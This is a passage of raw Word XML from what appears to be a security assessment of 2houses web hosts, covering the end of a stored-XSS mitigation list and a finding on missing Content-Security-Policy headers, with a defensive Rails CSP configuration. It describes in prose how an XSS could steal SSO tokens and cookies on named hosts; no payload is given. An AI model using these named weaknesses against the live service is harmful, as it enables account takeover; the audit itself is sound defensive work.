          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>content_tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, not string concatenation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sanitise user input at write time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with an allowlist HTML sanitiser (not the one that comes for free with Rails — those have a history of bypasses; use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>rails-html-sanitizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a strict allowlist).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add CSP with `script-src` locked down.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even a confirmed XSS is far less useful to an attacker with a strict CSP (there is currently </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>no CSP header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-007 — No Content-Security-Policy header on any 2houses application host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Missing security header / defense-in-depth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www.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>tools.2houses.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmed — no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Content-Security-Policy-Report-Only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> header seen on any response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every response I observed from the three 2houses Rails hosts omits the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> header. I also did not find a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&lt;meta http-equiv="Content-Security-Policy" ...&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag in the HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Other security headers are present (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>X-Frame-Options: SAMEORIGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>Strict-Transport-Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>X-XSS-Protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), but CSP — the one header that actually limits what JavaScript can do after an XSS — is absent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CSP is the only realistic mitigation against the stored-XSS surface flagged in FINDING-006 and the JS-readable SSO tokens flagged in FINDING-001. Without it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A stored XSS executes arbitrary JavaScript with full network access to every third-party host — including ability to POST SSO tokens to an attacker-controlled endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reads the unprotected cookies and fires them off.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>connect-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowlist means exfiltration endpoints are unlimited.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>frame-ancestors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protection (only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which doesn't let you allowlist specific parents).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>script-src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> means inline scripts and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> work; any injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> executes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rails supports CSP configuration via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>config.content_security_policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. A reasonable starter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rails.application.config.content_security_policy do |policy|</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.default_src :self</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.script_src  :self, :strict_dynamic, 'https://js.stripe.com',</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     'https://js.intercomcdn.com', 'https://widget.intercom.io',</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     'https://www.googletagmanager.com'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.style_src   :self, :unsafe_inline, 'https://fonts.googleapis.com'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.font_src    :self, 'https://fonts.gstatic.com'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.img_src     :self, :data, :https</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.connect_src :self, 'https://api-iam.intercom.io', 'https://api-js.mixpanel.com',</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                     'https://region1.google-analytics.com', 'https://api.axept.io'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.frame_src   'https://js.stripe.com', 'https://www.google.com'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.base_uri    :self</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.form_action :self</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.frame_ancestors :self</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  policy.report_uri  '/_csp_reports'</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>end</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rails.application.config.content_security_policy_nonce_generator =</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -&gt;(request) { SecureRandom.base64(16) }</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rails.application.config.content_security_policy_nonce_directives = %w(script-src)</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>report-only mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a week, collect violations, then enforce.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
